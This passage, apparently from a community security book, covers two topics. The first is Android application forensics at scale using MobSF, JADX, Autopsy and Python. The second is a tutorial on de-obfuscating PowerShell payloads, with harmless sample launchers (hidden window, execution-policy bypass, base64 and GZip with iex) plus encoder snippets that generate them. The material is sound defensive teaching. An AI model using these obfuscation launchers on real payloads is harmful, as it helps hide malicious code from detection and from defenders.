Mobile forensics, specifically as it pertains to Android devices, tends to focus a little more heavily on application analysis during the initial evaluation. Unlike Windows systems, the sandboxed nature of these devices (assuming they aren't and can't easily be rooted) makes it more difficult to obtain a deeper forensic image without first compromising an existing application (for example, through malicious webpages targeting exploits in Chrome, or by hijacking an insecure update process in a given application), utilizing a debugging or built-in administrative function, or installing an application with greater permissions (the latter two methods would still require privilege escalation to root). A typical stock Android phone has 60 to 100+ applications installed at any given time, and more recent phones ship with even more. This includes system applications maintained by Google, device/manufacturer applications such as those from Huawei or Samsung, and network provider ¹²⁵https://github.com/s3raph-x00/ ¹²⁶https://www.s3raph.com/ ¹²⁷http://discordapp.com/users/598660199062044687
• 96. Chapter 4 - Large Scale Android Application Analysis 89
applications such as those from Sprint, Vodafone, or Verizon. Additionally, device manufacturers and network providers typically have agreements with various companies, such as Facebook, to preinstall their applications during device provisioning. Most of these applications cannot be easily pulled during forensic analysis without utilizing some method of physical extraction (e.g., use of Qualcomm debugger functionality) or root access.
Part 1 - Automated Analysis
If during a forensic analysis you are lucky enough to get all of the Android applications resident on the system, you are left with the problem of analyzing 100+ applications. Most Android application analysis tools are developed to do automated analysis of individual applications, with some ability to do a comparative analysis of two APKs. In this space, MobSF¹²⁸ is considered one of the most popular application analysis tools. It provides a method for automatically analyzing various APKs, with varying levels of success in both automated static and dynamic analysis. Installation of this tool is fairly easy and the developer has fairly robust documentation (please refer to https://mobsf.github.io/docs/#/installation for the most up-to-date instructions). The following installation instructions work at the moment:
sudo apt-get install git python3.8 openjdk-8-jdk python3-dev python3-venv python3-pip build-essential libffi-dev libssl-dev libxml2-dev libxslt1-dev libjpeg8-dev zlib1g-dev wkhtmltopdf
git clone https://github.com/MobSF/Mobile-Security-Framework-MobSF.git
cd Mobile-Security-Framework-MobSF
sudo ./setup.sh
If you plan on installing this on a VM, please note that dynamic analysis is not really supported. Even if you were able to modify MobSF to run in a VM, there is a significant probability of specific functionality failing to execute properly, and any results would not be consistent or trustworthy. Personally, I use my own virtualized environment separate from MobSF, which will potentially be discussed in another guide. ¹²⁸https://github.com/MobSF/Mobile-Security-Framework-MobSF
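If a native install is not desirable, MobSF also publishes a Docker image. A minimal sketch (this assumes Docker is already installed; dynamic analysis is similarly limited in a container):

# Pull and run the published MobSF image, exposing the web UI on port 8000
docker pull opensecurity/mobile-security-framework-mobsf:latest
docker run -it --rm -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest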
• 97. Chapter 4 - Large Scale Android Application Analysis 90
Once installed, you can run MobSF from within the MobSF directory (<Mobile-Security-Framework-MobSF>) with the following simple command: ./run.sh. Additionally, you can specify the listening address and listening port, as MobSF starts its own web server for user interaction. The following default setting will be used if the command is started without arguments: 0.0.0.0:8000. Example post-run output: Accessing the hosted webpage with your favorite browser shows the following webpage:
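As a side note, the listening address and port mentioned above can be passed directly as an argument to the launch script (the values here are arbitrary):

# Bind the MobSF web server to localhost only, on port 8080
./run.sh 127.0.0.1:8080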
• 98. Chapter 4 - Large Scale Android Application Analysis 91
From here, you can upload the binary to the MobSF instance in your virtual machine: The webpage will often time out at this point, so click Recent Scans, which shows the following:
  • 99. Chapter 4 - Large Scale Android Application Analysis 92 Because we are in a VM, the dynamic report will be unavailable but the static report should provide the primary details for initial triage of the application. After a few minutes and depending on the size of the application, the report will be ready for analysis: Now for analysis of malware, there are a number of websites hosting samples for training and tool development but I have typically found vx-underground.org¹²⁹ fairly robust. ¹²⁹https://www.vx-underground.org/
  • 100. Chapter 4 - Large Scale Android Application Analysis 93 The malware needs to be extracted with the password infected and renamed with the extension .apk. The scan by MobSF showed the following details: There are two options to view either a Static Report or Dynamic Report. Because we are in a virtual machine, there will not be an available Dynamic report. The Static Report shows the following information: Outside of the calculated hashes, the actual information needed for an assessment is further down:
  • 101. Chapter 4 - Large Scale Android Application Analysis 94 The section in the above right shows that MobSF stored the decompiled Java code which can be compared to the results and referenced later. The section below shows the signing certificate has an unusual xuhang string in almost all of the issuer information. The next section of interest is related to the requested permissions: Permissions such as MOUNT_UNMOUNT_FILESYSTEMS for what appears to be a game looks incredibly unusual. Other sections of interest include various API functions that could potentially indicate application capabilities.
  • 102. Chapter 4 - Large Scale Android Application Analysis 95 For example, clicking on the com/g/bl.java shows the following code segment: Generally speaking, the function to pass commands to /system/bin/sh should be scrutinized and typically is indicative of malicious intent. This isn’t always the case as applications that provide system functionality typically use sh as a means to use native Android OS tools such as ping.
  • 103. Chapter 4 - Large Scale Android Application Analysis 96 Another area of concern is the collection and sending of sensitive device information to include the IMSI and wireless MAC address: While the functions and information accessed appear malicious, validating any suppositions with actual evidence of malicious intent would be prudent. The additional analysis is beyond the scope of this initial writeup but is typical of most malware analysis methodologies.
• 104. Chapter 4 - Large Scale Android Application Analysis 97
Part 2 - Manual Analysis
Now that we have done some initial analysis of an APK with an automated tool such as MobSF, let's dive into some manual analysis using JADX¹³⁰. JADX is an APK decompiler that converts compiled APKs and DEX files into readable decompiled code. The source code and compiled releases for JADX provide both CLI- and GUI-based applications that run on Linux, macOS, and Windows. After opening one of the APKs within JADX, a breakdown of the stored decompiled code, resources, and embedded files can be seen: Whether malicious or not, most Android applications have some level of obfuscation. In this case, the major programmatic functionality is not obfuscated, but the names of the classes (a, b, c, etc.) do not have significant meaning, which can make initial analysis more difficult: ¹³⁰https://github.com/skylot/jadx
  • 105. Chapter 4 - Large Scale Android Application Analysis 98 One area that should be checked is the APK signature and certificate details: This matches what MobSF had reported. It is possible to get differing results from different tools so double/triple checking relevant details is important. Another area for analysis is the AndroidManifest.XML file stored within the Resources folder structure:
• 106. Chapter 4 - Large Scale Android Application Analysis 99
Here we see the same significant number of permissions, along with some third-party application app keys which appear to be directly associated with the following GitHub repository: https://github.com/angcyo/umeng. Interestingly, the following topic on Alibaba Cloud references both the WRITE_EXTERNAL_STORAGE permission as required to dynamically update APKs using UMENG and the associated APPKEY: https://topic.alibabacloud.com/a/use-umeng-to-automatically-update-apk-and-umeng-apk_1_21_32538466.html.
• 107. Chapter 4 - Large Scale Android Application Analysis 100
If true, this has an obvious implication: even if no malicious logic is baked directly into the application at the time of dynamic and static analysis, the application could be manipulated at any later time. Anything beyond this initial triage is out of scope for the write-up, but this portion of the analysis is important because it highlights the need for manual review and for reading contextual clues. Any automation should be validated and checked regardless of scaling.
• 108. Chapter 4 - Large Scale Android Application Analysis 101
While usually successful, it should be noted that JADX cannot always decompile the compiled code back to Java, and any errors should be reviewed to ensure that the code which failed to decompile does not contain malicious logic. The following screenshot shows a typical decompilation error: The concept of this write-up is to provide a cursory analysis of a piece of malware as the foundation for automating large-scale analysis of APKs. The foundation begins, at minimum, with some of the above techniques (permissions and signatures), but also rests on basic threat hunting work such as searching for various exploitation techniques and indicators of compromise. In that sense, hard-coded references to /system/bin/sh, hard-coded IP addresses, and unusual permissions are fairly easy to find using the built-in search functionality:
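The same hunting can also be done outside the JADX GUI. As a rough sketch (the directory name is hypothetical and assumes the decompiled sources were exported to disk), grep can sweep the decompiled code for common indicators:

# Flag shell execution, embedded URLs, and hard-coded IPv4 addresses
grep -rn '/system/bin/sh' decompiled_src/
grep -rnE 'https?://[A-Za-z0-9./?=_-]+' decompiled_src/
grep -rnE '([0-9]{1,3}\.){3}[0-9]{1,3}' decompiled_src/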
• 109. Chapter 4 - Large Scale Android Application Analysis 102
Within JADX itself, I would recommend enabling searching within comments, as additional functionality using external APIs and websites is sometimes simply commented out but otherwise accessible.
Problem of Scale
So far, we have covered the bare basics of using MobSF to analyze an APK as well as how to manually interrogate the same APK using JADX. In most mobile malware forensic investigations with physical access (not logical), a stock Android phone has 100+ APKs (including system applications, device manufacturer applications, network provider applications, and third-party applications) that could need to be analyzed. Devices in active usage could reach beyond 200 APKs that potentially need to be analyzed. That is a significant number of applications for a malware forensic analysis, but the investigation could still be completed using MobSF and JADX in a few weeks. The problem comes at scale, by expanding the number of devices being analyzed. Now you may have 100+ devices, each with 100+ APKs that may or may not be the same version. This quickly becomes untenable, which results in a need to develop or adapt a mobile application analysis methodology that scales.
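Before building a fully custom pipeline, it is worth noting that MobSF exposes a REST API, so uploads and scans can at least be scripted. A minimal sketch only (endpoint paths and parameters may vary by MobSF version; the API key is shown in the MobSF web UI):

# Upload an APK through MobSF's REST API
API_KEY="<your MobSF API key>"
curl -F "file=@target.apk" -H "Authorization: $API_KEY" \
     http://127.0.0.1:8000/api/v1/upload

# The upload response includes a hash; use it to trigger the scan
curl -X POST -H "Authorization: $API_KEY" \
     --data "hash=<hash_from_upload>" http://127.0.0.1:8000/api/v1/scan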
• 110. Chapter 4 - Large Scale Android Application Analysis 103
Part 3 - Using Autopsy, JADX, and Python to Scrape and Parse Android Applications at Scale
The last scenario isn't a hypothetical one; it is one that I had to adjust and adapt my methodology for. To start with the forensic analysis, you need to have an Android image to work with. If you have one saved from a test device using Cellebrite, it can be used to test and develop the solution at scale. If you don't, you can simply pull a virtual machine from osboxes.org¹³¹. Keep in mind there are significant differences between x86 and ARM architectures and between Android versions, so don't be hyper-specific about file locations and file names. Pro-Tip: Using an Android VM (either from osboxes.org or another source) along with a host-only network adapter can allow you to capture and manipulate network traffic (including some SSL-encrypted traffic) by using your brand of network collection (Security Onion¹³² or simple Wireshark¹³³) and a MiTM proxy with SSLStrip (BetterCap¹³⁴). Combined with a code injection tool with memory reading capabilities (Frida¹³⁵), this can be the foundation of more advanced dynamic analysis methodologies. Once you have the appropriate image file (vmdk, bin, img, etc.), you can create a new case within Autopsy: ¹³¹https://www.osboxes.org/android-x86/ ¹³²https://github.com/Security-Onion-Solutions/securityonion ¹³³https://gitlab.com/wireshark/wireshark ¹³⁴https://github.com/bettercap/bettercap ¹³⁵https://github.com/frida/frida
  • 111. Chapter 4 - Large Scale Android Application Analysis 104 Select Disk Image or VM file as seen below:
  • 112. Chapter 4 - Large Scale Android Application Analysis 105 Select the appropriate image file: Select the appropriate Ingest Modules (you can leave this default for now; we will come back here).
• 113. Chapter 4 - Large Scale Android Application Analysis 106
Continue through the default options until the data source is ingested, as seen below: At this point we have the basic test and development case set up. Now it is time to start developing a solution to the problem of scale. The first portion of the problem is finding a relatively simple and automated way to pull APK files from data sources. Autopsy has a specific capability that allows you to use purpose-built Python plugins to automate such tasks. Using public examples (such as https://github.com/markmckinnon/Autopsy-Plugins), I modified one of the simpler Python scripts to search for and flag files with the .apk extension (amongst others):
  • 114. Chapter 4 - Large Scale Android Application Analysis 107 Please Note: In the script referenced above is a hardcoded file location to pull the found files to. This must be modified to match your system. Dynamically pulling the folder location appeared too difficult at the time due to Autopsy using modified Python methods that are cross compiled into Java (things get weird). Additionally, the following wiki¹³⁶ hasn’t really been updated so a significant amount of testing is needed. To aid in your troubleshooting, the location of the log file can be accessed by going to the case folder: ¹³⁶http://www.sleuthkit.org/autopsy/docs/api-docs/4.9.0/
  • 115. Chapter 4 - Large Scale Android Application Analysis 108 Going to the log folder:
  • 116. Chapter 4 - Large Scale Android Application Analysis 109 Finally, opening one of the plain text log files: Unfortunately, this file is locked while Autopsy is running and you must close Autopsy to view any associated error. Once a Python script has been developed and tested, you have to manually add in the Python plugin to the appropriate folder. A simple link can be accessed from the menu option below:
• 117. Chapter 4 - Large Scale Android Application Analysis 110
To add the Python plugin, you simply move an appropriately named folder structure containing the Python modules into the following directory: Now simply restart Autopsy and right-click the data source you wish to run the plugin against:
  • 118. Chapter 4 - Large Scale Android Application Analysis 111 Similar to before, if all is well a new option should be present: Now simply click Deselect All (since they have already run) and click your custom tool. If you are using a barebones osboxes VM it would be prudent to add some various APKs. Once the module finished running you should see the following:
• 119. Chapter 4 - Large Scale Android Application Analysis 112
So now we have a way to automate the scraping of APK files; to continue, we need to do some rudimentary analysis. Remember how JADX has a CLI? This functionality can help decompile the APKs fairly quickly, allowing for additional analysis using regex, individual file hashing, and other forensicating things. In this situation, I developed a companion Python script (YAAAAT_apk_ripper, part of Yet Another Android Application Tool¹³⁷) that embeds the functionality required for my use case: The following code section shows the functionality of running JADX and dumping the output to the case_extract folder: ¹³⁷https://github.com/s3raph-x00/YAAAAT
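As a rough standalone equivalent of that step (a sketch only; the folder names are hypothetical), the JADX CLI can be driven from a simple shell loop:

# Decompile every pulled APK into its own folder under case_extract
for apk in case_extract/apk/*.apk; do
    name=$(basename "$apk" .apk)
    jadx -d "case_extract/decompiled/$name" "$apk"
done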
• 120. Chapter 4 - Large Scale Android Application Analysis 113
This script works by iteratively going through the case_extract/apk folder structure and attempts to be fairly fault-tolerant in the case of incorrect file extensions or file corruption. Beyond the simple JADX decompiling functionality, additional functions can be added by analyzing the code sections of the decompiled APK using regex: The above code section attempts to find high-confidence URLs within the code base and extract the information to a mapped log file for manual analysis. There are other regex solutions to map out potential URLs, which helps mitigate missing aspects of URL crafting. Besides JADX, to parse embedded certificates (for APK signature analysis and potential certificate pinning implementations), the script incorporates Java's keytool if a Java JDK is present, and some methods using OpenSSL if not:
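As a minimal sketch of those two approaches (the APK name is hypothetical), a signing certificate can be inspected directly from the command line:

# With a JDK present: print the signing certificate straight from the APK
keytool -printcert -jarfile target.apk

# Without a JDK: pull the PKCS#7 signature block out of the archive
# (the signature file may also be *.DSA or *.EC) and parse it with OpenSSL
unzip -o target.apk 'META-INF/*.RSA' -d cert_extract/
openssl pkcs7 -inform DER -in cert_extract/META-INF/*.RSA -print_certs -text -noout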
• 121. Chapter 4 - Large Scale Android Application Analysis 114
The methods aren't perfect by any means, and more testing across a number of different certificate implementations is needed. Despite this, it is similar to the automated single-APK analysis using MobSF and the manual analysis with JADX, but it also allows for larger-scale analysis of APK signatures. This script is far from perfect or complete, but it foundationally provides the basic methodology to extract the specific information desired for large-scale analysis. Splunk becomes useful in this context, as the data contained in the text files can be ingested and parsed, allowing for larger-scale analysis in areas such as granular file changes in the embedded APKs, the addition of URLs and IP addresses, and other anomalies. This write-up does not go into extensive detail about every specific use case, but hopefully, given enough time, effort, and data, you can scale the application analysis methodology to suit your needs. Regardless of the implementation, Android APIs and APKs change frequently, so be sure to retest solutions and manually spot-check results to ensure they still fit the goal of the solution.
• 122. Chapter 5 - De-Obfuscating PowerShell Payloads
By Tristram¹³⁸ | Twitter¹³⁹ | Discord¹⁴⁰
Introduction
I have had the pleasure of working with many individuals within the cyber security field, belonging to both the blue and red teams. Regardless of which side you prefer to operate on, whether you're a penetration tester looking to put an organization's security program to the test or a blue teamer looking to stomp on adversaries during every step of their desired campaign, we are ultimately on the same side. We are advisors on risk and we offer guidance on how to eliminate that risk; the difference is how we respond. We are ultimately one team, operating as one entity to ensure the security and integrity of the organizations we serve and the data that they protect. Part of how we work towards this common goal is through professional development and imparting our knowledge to others. Projects such as this are an example of why our security community is strong. We care, we learn, we grow. Together, there is nothing that will stop us from being successful. As an individual who is primarily a blue teamer with roots in penetration testing, I am looking to impart unto you some of the common scenarios that I have faced, which I feel will provide you the foundation and confidence you're looking for to comfortably break down obfuscated PowerShell payloads. ¹³⁸https://github.com/gh0x0st ¹³⁹https://twitter.com/jdtristram ¹⁴⁰http://discordapp.com/users/789232435874496562
• 123. Chapter 5 - De-Obfuscating PowerShell Payloads 116
What Are We Dealing With?
PowerShell is a powerful scripting language that has eased the process of managing Windows systems. These management capabilities have evolved over the years as PowerShell has expanded beyond its exclusive Windows roots and become accessible on other systems such as macOS and Linux. Despite the technological advances this solution has provided system administrators over the years, it has also provided penetration testers and cyber criminals similar opportunities to be successful. This success is reflected in proof-of-concept exploit code for major vulnerabilities, such as what we saw with PrintNightmare / CVE-2021-34527 (https://github.com/nemo-wq/PrintNightmare-CVE-2021-34527). One of the hurdles people will find when they use PowerShell for these types of activities is that the code will ultimately be accessible in plain text. While this is helpful for security researchers learning from others and their published exploit code, it's equally helpful for security providers looking to reverse engineer and signature these payloads to prevent them from doing harm. For blue teamers, this is a good thing; however, for penetration testers, as well as cyber criminals, this will directly impact their success. In an effort to keep security providers from easily signaturing their payloads, they will introduce various levels of obfuscation to help hide their code in plain sight. While this helps the red teamers, it unfortunately makes our job as blue teamers a bit more difficult. However, with a little bit of exposure to common obfuscation techniques and how they work, you will find that de-obfuscating them is well within your grasp. Through this chapter, I am looking to expose you to the following obfuscation techniques and how you can de-obfuscate them:
1. Base64 Encoded Commands
2. Base64 Inline Expressions
3. GZip Compression
4. Invoke Operator
5. String Reversing
6. Replace Chaining
7. ASCII Translation
• 124. Chapter 5 - De-Obfuscating PowerShell Payloads 117
Stigma of Obfuscation
Obfuscation, in essence, is a puzzle of sorts, and with every puzzle, all you need is time. It's important to understand that obfuscation is not a be-all and end-all solution to preventing payloads from being signatured. If you continue to use the same obfuscated payload or obfuscation technique, it will eventually get busted. This reality can cause debates in the security community about its overall effectiveness, but it's important for us to understand that obfuscation serves two purposes for red teams: to bypass various signature-based detections from anti-virus solutions as well as AMSI, and to buy time in the event the payload is successful but later discovered by a blue team. Bypassing security solutions is the trivial part; where the gap typically exists is with the second purpose, when we are responding to incidents involving these payloads. Let's put this into perspective with a commonly experienced scenario: Assume we are a penetration tester performing an assessment against an organization. We managed to obtain a list of valid email addresses and decided to launch a phishing campaign, emailing the staff a Word document that contains a macro that launches a remotely hosted PowerShell script containing a reverse shell; neither the document nor the script is flagged by any known anti-virus. At some point the user reports the email; switching to the blue team's side, we launch our phishing assessment procedures and identify that the user did in fact open the email and got pwned. From the firewall logs we are able to see where the machine connected to and plug the hole. Continuing our incident response procedures, we follow up on the embedded payload to ensure that it doesn't include any other logic that we don't already know about, such as a mechanism giving it more than one remote address to reach out to in the event one gets discovered. As the penetration tester, we coded contingencies for this very scenario so that our payload does in fact use more than one remote address. To ensure our extra effort doesn't get steamrolled, we obfuscated our payload so the blue team would have to spend extra time lifting the veil, buying us more time to hopefully move laterally through the network, away from the point of entry. This is the barrier that must be broken through within a reasonable amount of time so that we can ensure that the threat we have evicted from our network stays evicted. As a blue teamer, if you're exposed to a complicated or unfamiliar obfuscation technique, then chances are you may move on to something else or spend too much time trying to uncover its secrets. To help overcome this obstacle, we will step through various obfuscation techniques, including how they're generated and how you can de-obfuscate them.
  • 125. Chapter 5 - De-Obfuscating PowerShell Payloads 118 Word of Caution It goes without saying that when dealing with PowerShell payloads that are malicious or otherwise suspicious then you should avoid trying to dissect these payloads on your production machine. No one wants to be responsible for a breach or get compromised themselves because they accidentally executed a piece of code that they did not understand. A good practice is to always have a sandbox solution on standby. You can use a local sandbox, such as a virtual machine, that has no connected network adapters, or at least configured on an entirely separate internet connection that contains no sensitive assets on the network. In addition to this, being sure you have enough storage for snapshots is very useful. This way if you accidentally compromise your sandbox, or want to get it back to a known-working state, then you can simply revert it and continue where you left off.
• 126. Chapter 5 - De-Obfuscating PowerShell Payloads 119
Base64 Encoded Commands
One of the first methods to obfuscate PowerShell payloads utilized a feature of the powershell.exe executable itself. Specifically, this executable supports the -EncodedCommand parameter, which accepts a base64-encoded string. Once called, PowerShell will decode the string and execute the code therein. While this is trivial to decode, the method is often enhanced with additional optional parameters. These optional parameters can also be called using partial names so long as they're unambiguous, which is a common practice with this particular launcher. This is arguably the most popular approach and is also one of the easiest to discover when reviewing logs. Let's take a look at the following payload of this technique and break it down.
1 powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc 'VwByAGkAdABlAC0ATwB1AHQAcAB1A
2 HQAIAAiAE8AYgBmAHUAcwBjAGEAdABlAGQAIABQAGEAeQBsAG8AYQBkACIA'
At a quick glance we can clearly see that powershell.exe is being called directly with 5 parameters being passed using partial names. We can look at the help file for this by running powershell -help. Let's break down these parameters:
Partial Parameter | Full Parameter | Description
-NoP | -NoProfile | Does not load the Windows PowerShell profile.
-NonI | -NonInteractive | Does not present an interactive prompt to the user.
-W Hidden | -WindowStyle | Sets the window style to Normal, Minimized, Maximized or Hidden.
-Exec Bypass | -ExecutionPolicy Bypass | Sets the default execution policy for the current session.
-Enc | -EncodedCommand | Accepts a base64-encoded string version of a command.
With our newfound understanding of the parameters in play, we can now break down exactly what's happening when this gets called; specifically, this session will launch unrestricted as a hidden window. Now that we understand the behavior of the PowerShell process when executed, our next step is to identify the encoded payload that's being executed behind the scenes. Decoding base64 is a trivial process, and we can accomplish it by using PowerShell itself to decode the string.
• 127. Chapter 5 - De-Obfuscating PowerShell Payloads 120
Keep in mind that running this method will not execute any underlying code by itself.
1 PS C:> $Bytes = [Convert]::FromBase64String('VwByAGkAdABlAC0ATwB1AHQAcAB1AHQAIAAiAE
2 8AYgBmAHUAcwBjAGEAdABlAGQAIABQAGEAeQBsAG8AYQBkACIA')
3 PS C:> $Command = [System.Text.Encoding]::Unicode.GetString($Bytes)
4 PS C:> Write-Output "[*] Decoded Command >> $Command"
5 [*] Decoded Command >> Write-Output "Obfuscated Payload"
Running this method reveals a simple payload, which was expected based on the size of the base64-encoded string; if the string were significantly larger, we could safely assume the payload would be larger as well. You can replicate this obfuscation technique for decoding practice using this snippet to encode a simple one-liner, or even expand to more complex scripts.
1 PS C:> $Command = 'Write-Output "Obfuscated Payload"'
2 PS C:> $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Command)
3 PS C:> $Base64 = [Convert]::ToBase64String($Bytes)
4 PS C:> Write-Output "[*] Obfuscated: powershell.exe -NoP -NonI -W Hidden -Exec Bypa
5 ss -Enc '$Base64'"
6 [*] Obfuscated: powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc 'VwByAGkAdABlA
7 C0ATwB1AHQAcAB1AHQAIAAiAE8AYgBmAHUAcwBjAGEAdABlAGQAIABQAGEAeQBsAG8AYQBkACIA'
• 128. Chapter 5 - De-Obfuscating PowerShell Payloads 121
Base64 Inline Expressions
This method is very similar to the technique that we saw previously, except instead of passing base64-encoded strings to the powershell.exe executable, we can embed base64-encoded strings directly into our scripts themselves. Let's see an example of this in action.
1 PS C:> iex ([System.Text.Encoding]::Unicode.GetString(([convert]::FromBase64String(
2 'VwByAGkAdABlAC0ATwB1AHQAcAB1AHQAIAAiAE8AYgBmAHUAcwBjAGEAdABlAGQAIABQAGEAeQBsAG8AYQB
3 kACIA'))))
The majority of obfuscation techniques for PowerShell payloads are simply different string manipulation techniques. In the scheme of things, strings are not a risk and are not executable on their own; they rely on a launcher to take the string and treat it as executable code. In the above sample, let's observe the three-letter command, namely iex, which is an alias for the Invoke-Expression cmdlet. The Invoke-Expression cmdlet accepts a string which is then executed as a command. To put this into perspective, we will create a variable called $String that will store the value 'Get-Service'. If we pass this variable to Invoke-Expression, we will see a list of services output to the console as if we simply ran Get-Service.
1 PS C:> $String = 'Get-Service'
2 PS C:> Invoke-Expression $String
3
4 Status Name DisplayName
5 ------ ---- -----------
6 Stopped AarSvc_b0e91cc Agent Activation Runtime_b0e91cc
7 Stopped AJRouter AllJoyn Router Service
8 Stopped ALG Application Layer Gateway Service
9 …SNIP…
Returning to our obfuscated sample, we know that the payload is essentially built from two components:
1. The launcher (iex)
2. The base64 decoder (string / command)
  • 129. Chapter 5 - De-Obfuscating PowerShell Payloads 122 Once the base64 decoder runs, it will return a string. By passing this as an argument to iex, it will essentially execute the resulting string from the base64 decoder. We can omit the iex, and simply execute the decoder to reveal the underlying string. 1 PS C:> ([System.Text.Encoding]::Unicode.GetString(([convert]::FromBase64String('VwB 2 yAGkAdABlAC0ATwB1AHQAcAB1AHQAIAAiAE8AYgBmAHUAcwBjAGEAdABlAGQAIABQAGEAeQBsAG8AYQBkACI 3 A')))) 4 Write-Output "Obfuscated Payload" This has revealed our obfuscated payload as Write-Output "Obfuscated Payload". If we were to include iex, our resulting string would be executed 1 PS C:> iex ([System.Text.Encoding]::Unicode.GetString(([convert]::FromBase64String( 2 'VwByAGkAdABlAC0ATwB1AHQAcAB1AHQAIAAiAE8AYgBmAHUAcwBjAGEAdABlAGQAIABQAGEAeQBsAG8AYQB 3 kACIA')))) 4 Obfuscated Payload You are going to find that in most of the obfuscated scripts you’ll come across, you’ll be met with Invoke-Expression, its alias or an obfuscated representation of either. Remember, a plain string cannot be executed without a launcher. You can replicate this obfuscation technique for decoding practice using this snippet to encode a simple one-liner, or even expand to more complex scripts. 1 PS C:> $Command = 'Write-Output "Obfuscated Payload"' 2 PS C:> $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Command) 3 PS C:> $Base64 = [Convert]::ToBase64String($Bytes) 4 PS C:> iex ([System.Text.Encoding]::Unicode.GetString(([convert]::FromBase64String( 5 'VwByAGkAdABlAC0ATwB1AHQAcAB1AHQAIAAiAE8AYgBmAHUAcwBjAGEAdABlAGQAIABQAGEAeQBsAG8AYQB 6 kACIA'))))
• 130. Chapter 5 - De-Obfuscating PowerShell Payloads 123
GZip Compression
A relatively successful obfuscation technique is built around compressing byte streams. Similar to how we can compress files on disk to make them smaller, we can also compress payloads, then store and execute them from within a script. This technique was quite successful once it started being utilized because of the relative difficulty of breaking down the underlying code to reveal the intended payload. Let's see an example of this.
1 PS C:> $decoded = [System.Convert]::FromBase64String("H4sIAAAAAAAEAAsvyixJ1fUvLSko
2 LVFQ8k9KKy1OTixJTVEISKzMyU9MUQIA9Wd9xiEAAAA=");$ms = (New-Object System.IO.MemoryStr
3 eam($decoded,0,$decoded.Length));iex(New-Object System.IO.StreamReader(New-Object Sy
4 stem.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Decompr
5 ess))).ReadToEnd()
Depending on your familiarity with .NET classes, there are some unfamiliar or potentially intimidating components displayed in this code example. Additionally, we see a slightly ambiguous technique where a multiline payload is converted into an effective one-liner, denoted by the use of semicolons (;). Let's try to make this code a little easier to read by entering new lines where we see semicolons.
1 PS C:> $decoded = [System.Convert]::FromBase64String("H4sIAAAAAAAEAAsvyixJ1fUvLSkoL
2 VFQ8k9KKy1OTixJTVEISKzMyU9MUQIA9Wd9xiEAAAA=")
3 PS C:> $ms = (New-Object System.IO.MemoryStream($decoded,0,$decoded.Length))
4 PS C:> iex(New-Object System.IO.StreamReader(New-Object System.IO.Compression.GZipS
5 tream($ms, [System.IO.Compression.CompressionMode]::Decompress))).readtoend()
Great, this is now a bit easier for us to read. If this is our first time seeing this, we'd likely think the easy win is looking at the decoded base64 string stored in the first variable, so let's try it.
1 PS C:> [System.Convert]::FromBase64String("H4sIAAAAAAAEAAsvyixJ1fUvLSkoLVFQ8k9KKy1O
2 TixJTVEISKzMyU9MUQIA9Wd9xiEAAAA=")
3 31
4 139
5 8
6 0
7 …SNIP…
This revealed a byte array. Even if we converted the byte array to a string by using [System.Text.Encoding]::ASCII.GetString(), it would still leave us just as confused. One of the benefits of this technique is that some security providers decode these strings automatically, but in this case, it wouldn't necessarily reveal anything immediately signaturable on its own.
• 131. Chapter 5 - De-Obfuscating PowerShell Payloads 124
1 PS C:> [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("
2 H4sIAAAAAAAEAAsvyixJ1fUvLSkoLVFQ8k9KKy1OTixJTVEISKzMyU9MUQIA9Wd9xiEAAAA="))
3 ?
4 /?,I??/-)(-QP?OJ+-NN,IMQH???OLQ ?g}?!
Let's keep looking at the payload. If you remember from before, when we see iex, or Invoke-Expression, it's executing a resulting string. With this in mind, look at how iex is followed by a grouping operator (), which contains a set of expressions. This tells us that iex ultimately executes the resulting code from the inner expressions. If we simply remove iex and execute the remaining code, we'll see the resulting code that is being executed.
1 PS C:> $decoded = [System.Convert]::FromBase64String("H4sIAAAAAAAEAAsvyixJ1fUvLSkoL
2 VFQ8k9KKy1OTixJTVEISKzMyU9MUQIA9Wd9xiEAAAA=")
3 PS C:> $ms = (New-Object System.IO.MemoryStream($decoded,0,$decoded.Length))
4 PS C:> (New-Object System.IO.StreamReader(New-Object System.IO.Compression.GZipStre
5 am($ms, [System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()
6
7 Write-Output "Obfuscated Payload"
Fantastic: by making a readability adjustment and then removing an iex command, we have torn down a seemingly complicated payload and revealed our obfuscated payload. You can replicate this obfuscation technique for decoding practice using this snippet to encode a simple one-liner, or even expand to more complex scripts.
  • 132. Chapter 5 - De-Obfuscating PowerShell Payloads 125 17 $encodedGzipStream = [System.Convert]::ToBase64String($gzipStream) 18 19 ## Decoder Encoder 20 [System.String]$Decoder = '$decoded = [System.Convert]::FromBase64String("<Base64>") 21 ;$ms = (New-Object System.IO.MemoryStream($decoded,0,$decoded.Length));iex(New-Objec 22 t System.IO.StreamReader(New-Object System.IO.Compression.GZipStream($ms, [System.IO 23 .Compression.CompressionMode]::Decompress))).readtoend()' 24 [System.String]$Decoder = $Decoder -replace "<Base64>", $encodedGzipStream 25 26 # Launcher 27 $decoded = [System.Convert]::FromBase64String("H4sIAAAAAAAEAAsvyixJ1fUvLSkoLVFQCimqV 28 PBILEpJLVICAGWcSyMZAAAA") 29 $ms = (New-Object System.IO.MemoryStream($decoded,0,$decoded.Length)) 30 Invoke-Expression (New-Object System.IO.StreamReader(New-Object System.IO.Compressio 31 n.GZipStream($ms, [System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()
• 133. Chapter 5 - De-Obfuscating PowerShell Payloads 126
Invoke Operator
At this point we have found that a common pitfall in obfuscating PowerShell commands is the glaringly obvious usage of the Invoke-Expression cmdlet. This is to be expected because its commonly known purpose is to run supplied expressions. However, this isn't the only way to directly execute strings. PowerShell supports the usage of what's called the Invoke Operator, which is seen as & within the scripting language. The behavior of this operator is similar to that of Invoke-Expression in that it will execute a given string. There is something special about this operator that gives it an edge on Invoke-Expression: you can chain call operators in the pipeline. For example, the following three commands are all valid and will return the same thing:
1 PS C:> Get-Service | Where-Object {$_.Status -eq 'Running'}
2 PS C:> Invoke-Expression 'Get-Service' | Where-Object {$_.Status -eq 'Running'}
3 PS C:> & 'Get-Service' | & 'Where-Object' {$_.Status -eq 'Running'}
Its inclusion in a complex payload can be a little tricky, though, as the string it invokes cannot itself include parameters. We can put this into perspective with the following example, where the first command is valid and the second will throw an error.
